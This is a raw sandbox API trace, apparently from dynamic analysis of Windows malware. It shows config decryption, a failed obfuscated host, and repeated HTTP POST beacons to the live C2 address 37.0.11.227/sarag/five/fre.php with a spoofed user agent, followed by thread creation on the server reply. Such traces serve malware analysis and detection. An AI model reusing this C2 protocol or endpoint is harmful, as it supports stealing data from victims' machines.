CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0321.027] GetProcessHeap () returned 0x690000 [0321.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0321.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.028] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0321.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.029] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.029] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.029] GetProcessHeap () returned 0x690000 [0321.030] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0321.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.037] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0321.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.038] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0321.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.038] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0321.038] GetProcessHeap () returned 0x690000 [0321.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0321.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.039] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0321.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.040] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0321.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.041] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0321.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.042] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0321.042] GetProcessHeap () returned 0x690000 [0321.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0321.042] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0321.042] GetProcessHeap () returned 0x690000 [0321.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0321.043] GetProcessHeap () returned 0x690000 [0321.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0321.044] GetProcessHeap () returned 0x690000 [0321.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0321.044] GetProcessHeap () returned 0x690000 [0321.044] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0321.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.045] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.049] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0321.055] GetProcessHeap () returned 0x690000 [0321.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0321.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.056] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0321.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.057] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.058] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.058] GetProcessHeap () returned 0x690000 [0321.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0321.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.060] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0321.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.061] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0321.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.062] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0321.062] GetProcessHeap () returned 0x690000 [0321.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0321.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.062] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0321.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.065] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0321.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.066] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0321.066] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.066] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0321.066] GetProcessHeap () returned 0x690000 [0321.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0321.067] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0321.067] GetProcessHeap () returned 0x690000 [0321.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0321.067] socket (af=2, type=1, protocol=6) returned 0xafc [0321.067] connect (s=0xafc, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0321.090] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0321.090] GetProcessHeap () returned 0x690000 [0321.090] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0321.090] GetProcessHeap () returned 0x690000 [0321.090] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0321.090] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0321.091] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0321.091] GetProcessHeap () returned 0x690000 [0321.091] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0321.091] GetProcessHeap () returned 0x690000 [0321.092] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0321.092] GetProcessHeap () returned 0x690000 [0321.092] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0321.092] GetProcessHeap () returned 0x690000 [0321.092] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0321.093] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0321.093] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0321.093] GetProcessHeap () returned 0x690000 [0321.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0321.093] GetProcessHeap () returned 0x690000 [0321.094] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0321.094] send (s=0xafc, buf=0x6ad508*, len=242, flags=0) returned 242 [0321.094] send (s=0xafc, buf=0x6aba40*, len=159, flags=0) returned 159 [0321.094] GetProcessHeap () returned 0x690000 [0321.094] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0321.094] recv (in: s=0xafc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0321.166] GetProcessHeap () returned 0x690000 [0321.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0321.167] GetProcessHeap () returned 0x690000 [0321.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0321.168] GetProcessHeap () returned 0x690000 [0321.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0321.168] GetProcessHeap () returned 0x690000 [0321.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0321.169] closesocket (s=0xafc) returned 0 [0321.169] GetProcessHeap () returned 0x690000 [0321.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0321.169] GetProcessHeap () returned 0x690000 [0321.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0321.170] GetProcessHeap () returned 0x690000 [0321.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0321.170] GetProcessHeap () returned 0x690000 [0321.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0321.170] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1848) returned 0xafc [0321.172] Sleep (dwMilliseconds=0xea60) [0321.173] GetProcessHeap () returned 0x690000 [0321.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0321.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.174] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.178] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0321.183] GetProcessHeap () returned 0x690000 [0321.183] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0321.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.184] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0321.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.185] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.186] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.186] GetProcessHeap () returned 0x690000 [0321.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0321.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.187] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0321.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.188] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0321.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.188] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0321.189] GetProcessHeap () returned 0x690000 [0321.189] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0321.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.189] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0321.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.190] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0321.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.191] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0321.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.192] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0321.192] GetProcessHeap () returned 0x690000 [0321.192] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0321.192] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0321.192] GetProcessHeap () returned 0x690000 [0321.192] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0321.192] GetProcessHeap () returned 0x690000 [0321.193] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0321.193] GetProcessHeap () returned 0x690000 [0321.193] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0321.194] GetProcessHeap () returned 0x690000 [0321.194] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0321.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.195] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.199] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0321.203] GetProcessHeap () returned 0x690000 [0321.203] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0321.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.206] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0321.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.207] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.208] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.208] GetProcessHeap () returned 0x690000 [0321.208] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0321.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.209] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0321.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.210] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0321.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.211] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0321.211] GetProcessHeap () returned 0x690000 [0321.211] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0321.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.212] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0321.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.212] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0321.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.213] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0321.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.214] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0321.214] GetProcessHeap () returned 0x690000 [0321.214] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0321.214] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0321.214] GetProcessHeap () returned 0x690000 [0321.214] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0321.214] socket (af=2, type=1, protocol=6) returned 0xb00 [0321.214] connect (s=0xb00, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0321.239] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0321.239] GetProcessHeap () returned 0x690000 [0321.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0321.239] GetProcessHeap () returned 0x690000 [0321.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0321.239] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0321.240] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0321.240] GetProcessHeap () returned 0x690000 [0321.240] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0321.240] GetProcessHeap () returned 0x690000 [0321.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0321.241] GetProcessHeap () returned 0x690000 [0321.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0321.241] GetProcessHeap () returned 0x690000 [0321.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0321.241] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0321.242] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0321.242] GetProcessHeap () returned 0x690000 [0321.242] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0321.242] GetProcessHeap () returned 0x690000 [0321.243] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0321.243] send (s=0xb00, buf=0x6ad508*, len=242, flags=0) returned 242 [0321.243] send (s=0xb00, buf=0x6aba40*, len=159, flags=0) returned 159 [0321.243] GetProcessHeap () returned 0x690000 [0321.243] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0321.243] recv (in: s=0xb00, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0321.345] GetProcessHeap () returned 0x690000 [0321.345] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0321.345] GetProcessHeap () returned 0x690000 [0321.346] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0321.346] GetProcessHeap () returned 0x690000 [0321.346] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0321.346] GetProcessHeap () returned 0x690000 [0321.346] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0321.346] closesocket (s=0xb00) returned 0 [0321.347] GetProcessHeap () returned 0x690000 [0321.347] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0321.347] GetProcessHeap () returned 0x690000 [0321.348] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0321.348] GetProcessHeap () returned 0x690000 [0321.348] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0321.348] GetProcessHeap () returned 0x690000 [0321.348] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0321.349] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x184c) returned 0xb00 [0321.351] Sleep (dwMilliseconds=0xea60) [0321.356] GetProcessHeap () returned 0x690000 [0321.356] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0321.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.358] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.365] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0321.378] GetProcessHeap () returned 0x690000 [0321.378] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0321.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.380] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0321.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.381] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.382] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.382] GetProcessHeap () returned 0x690000 [0321.382] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0321.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.383] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, 